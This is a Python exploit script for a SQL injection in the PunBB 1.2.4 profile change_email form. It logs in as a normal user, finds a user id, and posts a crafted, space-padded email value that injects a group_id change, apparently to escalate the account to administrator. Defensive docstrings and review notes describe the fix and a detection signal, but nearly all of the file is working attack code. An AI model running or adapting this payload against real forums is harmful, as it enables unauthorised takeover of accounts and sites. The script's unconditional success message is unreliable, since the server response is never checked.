#!/usr/bin/env python3
"""Proof-of-concept for the PunBB 1.2.4 ``change_email`` SQL injection.

The script logs in as an ordinary forum user, locates a user id from the
index page, and submits a specially constructed value through the
``profile.php?action=change_email`` form.  Read from the defender's side,
it documents the weakness: the submitted email reaches a SQL statement
without being parameterised, so quote characters and padding in the value
change the statement's meaning.  The fix belongs on the server: bind the
email as a parameter (or escape it correctly), validate it as an email
address before any length handling, and apply length limits before rather
than after escaping.  Requests to ``change_email`` whose ``req_new_email``
contains quote characters or long runs of whitespace are a useful
detection signal for this pattern.
"""
import requests
import sys
import re
from urllib.parse import urljoin


class Colors:
    """ANSI escape sequences used to colour terminal output."""

    GREEN = '\033[92m'
    BLUE = '\033[94m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    CYAN = '\033[96m'
    RESET = '\033[0m'


def banner():
    """Print the tool's title box in bold cyan.

    The box-drawing string is kept exactly as published; its original line
    breaks appear to have been collapsed to spaces in this copy.
    """
    print(Colors.BOLD + Colors.CYAN + """ ╔══════════════════════════════════════════════════════════════╗ ║ PunBB 1.2.4 - change_email SQL Injection ║ ║ ║ ║ by www.downgrade-net.ru ║ ╚══════════════════════════════════════════════════════════════╝ """ + Colors.RESET)


def success(msg):
    """Print *msg* as a green ``[+]`` status line."""
    print(Colors.GREEN + "[+] " + msg + Colors.RESET)


def info(msg):
    """Print *msg* as a blue ``[*]`` status line."""
    print(Colors.BLUE + "[*] " + msg + Colors.RESET)


def warning(msg):
    """Print *msg* as a yellow ``[!]`` status line."""
    print(Colors.YELLOW + "[!] " + msg + Colors.RESET)


def error(msg):
    """Print *msg* as a red ``[-]`` status line."""
    print(Colors.RED + "[-] " + msg + Colors.RESET)


def main():
    """Run the proof of concept from the command line.

    Expects five positional arguments (see the ``Example:`` line below:
    base URL, username, password, current email, domain).  Exits with
    status 1 on missing arguments, failed login, or a missing user id.
    """
    banner()
    # NOTE(review): the argument placeholders in the usage line appear to
    # have been stripped from this copy; the example line shows the order.
    if len(sys.argv) < 6:
        print(f"Usage: python3 {sys.argv[0]} ")
        print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com")
        sys.exit(1)
    url = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]
    email = sys.argv[4]
    domain = sys.argv[5]
    # One session so the login cookie is reused by the later requests.
    s = requests.Session()
    info("Logging in as normal user...")
    login_data = {
        'req_username': username,
        'req_password': password,
        'form_sent': '1'
    }
    r = s.post(urljoin(url, "/login.php?action=in"), data=login_data)
    # Login is judged by the HTTP status and by "punbb_cookie" appearing in
    # the cookie jar's string form; a 200 with an error page and no cookie
    # is treated as failure.
    if r.status_code != 200 or "punbb_cookie" not in str(r.cookies):
        error("Login failed!")
        sys.exit(1)
    success("Successfully logged in!")
    info("Extracting user_id...")
    r = s.get(urljoin(url, "/index.php"))
    # Takes the first profile.php?id=N link on the index page.
    # NOTE(review): nothing here ties that link to the logged-in account;
    # presumably the index page links the current user first - verify.
    match = re.search(r'profile\.php\?id=(\d+)', r.text)
    if match:
        user_id = match.group(1)
        success(f"User-ID found: {user_id}")
    else:
        error("Could not find user_id!")
        sys.exit(1)
    info("Creating payload...")
    # The value is built from the supplied email with quote characters
    # inserted, then space-padded so that payload + padding + append is
    # exactly 50 characters before the trailing "@domain" part.  The 50 is
    # hard-coded; it presumably matches a server-side length limit applied
    # to the email column - the defensive takeaway is that length limits
    # and escaping must be applied in an order that cannot strip a closing
    # quote, and that the value should be bound as a query parameter.
    payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\','
    append = "group_id='1"
    padding = " " * (50 - len(append) - len(payload))
    final_email = payload + padding + append + f'"@{domain}'
    info(f"Payload: {final_email[:70]}...")
    success("Sending SQL Injection payload...")
    change_data = {
        'req_new_email': final_email,
        'form_sent': '1'
    }
    r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data)
    # NOTE(review): the response of this POST is never inspected; the
    # "finished successfully" banner below is printed unconditionally.
    print(Colors.BOLD + Colors.GREEN + "\n" + "="*65)
    print(" EXPLOIT FINISHED SUCCESSFULLY!")
    print("="*65 + Colors.RESET)
    print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        error("Interrupted by user")
    except Exception as e:
        # Top-level boundary: report and exit normally instead of a traceback.
        error(f"Error: {e}")